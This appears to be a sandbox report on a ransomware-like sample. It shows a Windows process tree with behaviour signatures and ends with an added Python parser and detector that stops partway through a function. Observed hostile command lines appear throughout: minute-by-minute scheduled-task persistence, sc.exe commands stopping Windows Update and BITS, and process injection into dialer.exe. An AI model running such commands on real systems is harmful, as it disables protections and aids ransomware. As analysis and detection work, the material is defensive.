      C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe" | PID:4760
        - Scheduled Task/Job: Scheduled Task
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html | PID:6000
        - Checks processor information in registry
        - Enumerates system info in registry
        - Modifies data under HKEY_USERS
        - Modifies registry class
        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        - Suspicious use of FindShellTrayWindow
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x368,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f220 | PID:5224
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1808,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:3 | PID:3488
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2352,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2344 /prefetch:2 | PID:1496
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1924,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:8 | PID:3700
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3480,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1 | PID:2756
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3512,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1 | PID:2764
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1596,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=4816 /prefetch:8 | PID:4760
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4848,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5072 /prefetch:8 | PID:3732
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5488,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5496 /prefetch:8 | PID:3204
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8 | PID:64
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8 | PID:2592
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window | PID:3876
          - Checks processor information in registry
          - Enumerates system info in registry
          - Modifies data under HKEY_USERS
          - Modifies registry class
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x25c,0x260,0x264,0x258,0x280,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f220 | PID:532
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1940,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2860 /prefetch:3 | PID:396
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2832,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2828 /prefetch:2 | PID:5984
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:8 | PID:3252
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4392,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:8 | PID:4788
          C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8 | PID:4544
          C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8 | PID:2828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4684,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:86⤵PID:5840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4680,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:86⤵PID:2400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4708,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4588 /prefetch:86⤵PID:6032
-
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "CompPkg"4⤵PID:4632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBBD4.tmp.bat""4⤵PID:5716
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:3552
-
-
-
-
-
depth 2 | PID 1928 | C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe
  - Suspicious use of WriteProcessMemory

depth 3 | PID 4904 | C:\Users\Admin\AppData\Roaming\CompPkg.exe
  cmdline: C:\Users\Admin\AppData\Roaming\CompPkg.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken

depth 2 | PID 2016 | C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

depth 3 | PID 3968 | C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff982dedcf8,0x7ff982dedd04,0x7ff982dedd10

depth 3 | PID 932 | C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=1976 /prefetch:2

depth 3 | PID 5200 | C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1476,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2240 /prefetch:3

depth 3 | PID 2268 | C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2248 /prefetch:8

depth 3 | PID 736 | C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3200 /prefetch:1

depth 3 | PID 2384 | C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3244 /prefetch:1

depth 3 | PID 5748 | C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4400,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4420 /prefetch:2

depth 3 | PID 3056 | C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4704 /prefetch:1

depth 3 | PID 2372 | C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5040,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5056 /prefetch:8

depth 3 | PID 4684 | C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5520,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5188 /prefetch:8

depth 2 | PID 1128 | C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

depth 3 | PID 1424 | C:\Windows\System32\Conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

depth 3 | PID 3604 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
depth 1 | PID 3684 | C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

depth 1 | PID 3864 | C:\Windows\system32\DllHost.exe
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

depth 1 | PID 4028 | C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

depth 1 | PID 4156 | C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

depth 1 | PID 4396 | C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

depth 1 | PID 5608 | C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

depth 1 | PID 5640 | C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

depth 1 | PID 5576 | C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p

depth 1 | PID 5508 | C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

depth 1 | PID 1516 | C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

depth 1 | PID 4388 | C:\Windows\system32\SppExtComObj.exe
  cmdline: C:\Windows\system32\SppExtComObj.exe -Embedding

depth 1 | PID 2312 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Modifies data under HKEY_USERS

depth 1 | PID 3296 | C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

depth 1 | PID 5060 | C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

depth 1 | PID 5540 | C:\Windows\system32\DllHost.exe
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

depth 1 | PID 3024 | C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

depth 1 | PID 5452 | C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

depth 1 | PID 3512 | C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

depth 1 | PID 4600 | C:\Windows\system32\wbem\wmiprvse.exe
  cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  - Checks BIOS information in registry
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of AdjustPrivilegeToken
depth 1 | PID 1632 | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe
  cmdline: C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

depth 2 | PID 1920 | C:\Windows\system32\sc.exe
  cmdline: C:\Windows\system32\sc.exe stop UsoSvc
  - Launches sc.exe

depth 2 | PID 1292 | C:\Windows\system32\sc.exe
  cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
  - Launches sc.exe

depth 2 | PID 2760 | C:\Windows\system32\sc.exe
  cmdline: C:\Windows\system32\sc.exe stop wuauserv
  - Launches sc.exe

depth 2 | PID 1760 | C:\Windows\system32\sc.exe
  cmdline: C:\Windows\system32\sc.exe stop bits
  - Launches sc.exe

depth 2 | PID 4340 | C:\Windows\system32\sc.exe
  cmdline: C:\Windows\system32\sc.exe stop dosvc
  - Launches sc.exe

depth 2 | PID 4492 | C:\Windows\system32\dialer.exe
  cmdline: C:\Windows\system32\dialer.exe

depth 2 | PID 6036 | C:\Windows\system32\dialer.exe
  cmdline: C:\Windows\system32\dialer.exe

depth 2 | PID 4832 | C:\Windows\system32\dialer.exe
  cmdline: dialer.exe

depth 1 | PID 4980 | C:\Windows\system32\DllHost.exe
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

depth 1 | PID 5276 | C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
  - Modifies data under HKEY_USERS

depth 1 | PID 5716 | C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

depth 1 | PID 3340 | C:\Windows\system32\DllHost.exe
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

depth 1 | PID 4620 | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

depth 1 | PID 2440 | C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

depth 1 | PID 3476 | C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

depth 1 | PID 5068 | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

depth 1 | PID 4064 | C:\Windows\system32\OpenWith.exe
  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
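The raw tree lines above fuse the image path to the command line, the tree depth to the last argument and the PID after the ⤵ marker, which makes them awkward to search. The following added example (not part of this report or of any sandbox vendor's code) parses lines in that raw form back into a parent/child structure and runs the three detections this tree motivates: a burst of sc.exe stop commands against the Windows Update and BITS services from one parent, dialer.exe spawned by a non-Windows binary that itself triggered the WriteProcessMemory and SetThreadContext signatures (the usual process-hollowing pattern), and the schtasks /delete plus Temp .bat with timeout cleanup. The sample lines are a constructed subset copied from the tree above; the HOST_BINARIES set and the three-service threshold are assumptions, not values from the report.

```python
"""Parse raw sandbox process-tree lines and run detections over them.
Added example; not part of the report. Python 3.8+, standard library only."""
import ntpath
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# One process as the report renders it: <image><cmdline><depth>⤵ followed either by
# PID:<n> on the same line or, when signatures fired, by "- <signature>" lines and a
# separate "PID:<n>" line. The image ends at the first ".exe"; the depth is the single
# digit glued to the end of the command line.
PROC_RE = re.compile(r"^(?P<image>.*?\.exe)(?P<cmdline>.*)(?P<depth>\d)⤵(?:PID:(?P<pid>\d+))?", re.I)
PID_RE = re.compile(r"^PID:(\d+)")

# Constructed subset of the tree above (the Edge/Chrome children are left out).
SAMPLE = r'''
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "CompPkg"4⤵PID:4632
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBBD4.tmp.bat""4⤵PID:5716
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:3552
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Users\Admin\AppData\Roaming\CompPkg.exeC:\Users\Admin\AppData\Roaming\CompPkg.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4904
C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exeC:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1920
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1292
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2760
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1760
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:4340
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4492
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:6036
C:\Windows\system32\dialer.exedialer.exe2⤵PID:4832
'''


@dataclass
class Proc:
    image: str
    cmdline: str
    depth: int
    pid: Optional[int] = None
    parent: Optional["Proc"] = None
    sigs: List[str] = field(default_factory=list)
    children: List["Proc"] = field(default_factory=list)


def parse_tree(text: str) -> List[Proc]:
    """Rebuild parent/child links from the depth column: the parent of a depth-d
    process is the most recent depth-(d-1) process. A depth-d line whose parent is
    not in the fragment (like the depth-4 lines at the top) gets parent None."""
    procs: List[Proc] = []
    last_at_depth: Dict[int, Proc] = {}
    cur: Optional[Proc] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = PROC_RE.match(line)
        if m:
            cur = Proc(m["image"], m["cmdline"].strip(), int(m["depth"]),
                       int(m["pid"]) if m["pid"] else None)
            cur.parent = last_at_depth.get(cur.depth - 1)
            if cur.parent:
                cur.parent.children.append(cur)
            for d in [d for d in last_at_depth if d >= cur.depth]:
                del last_at_depth[d]          # a new node at depth d invalidates deeper ones
            last_at_depth[cur.depth] = cur
            procs.append(cur)
        elif cur and line.startswith("- "):
            cur.sigs.append(line[2:])
        elif cur and PID_RE.match(line):
            cur.pid = int(PID_RE.match(line).group(1))
    return procs


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
INJECTION_SIGS = {"Suspicious use of SetThreadContext", "Suspicious use of WriteProcessMemory"}
HOST_BINARIES = {"dialer.exe"}   # assumption: benign binaries seen used as injection hosts


def update_service_tampering(procs: List[Proc], threshold: int = 3) -> Dict[Optional[int], List[str]]:
    """Parent PID -> update services it stopped via sc.exe, for parents above the threshold."""
    stopped: Dict[Optional[int], set] = {}
    for p in procs:
        toks = p.cmdline.lower().split()
        if basename(p.image) == "sc.exe" and len(toks) >= 3 and toks[1] == "stop" and toks[2] in UPDATE_SERVICES:
            key = p.parent.pid if p.parent else None
            stopped.setdefault(key, set()).add(toks[2])
    return {pid: sorted(s) for pid, s in stopped.items() if len(s) >= threshold}


def hollowing_candidates(procs: List[Proc]) -> List[Tuple[Optional[int], Optional[int]]]:
    """(parent PID, child PID) where a known host binary was spawned by a non-Windows
    image that also fired the remote-write and thread-context signatures."""
    out = []
    for p in procs:
        if basename(p.image) in HOST_BINARIES and p.parent:
            parent_in_windows = p.parent.image.lower().startswith("c:\\windows\\")
            if not parent_in_windows and INJECTION_SIGS <= set(p.parent.sigs):
                out.append((p.parent.pid, p.pid))
    return out


def cleanup_pattern(procs: List[Proc]) -> List[Tuple[str, Optional[int]]]:
    """schtasks /delete, and cmd.exe running a batch file from Temp with a timeout child."""
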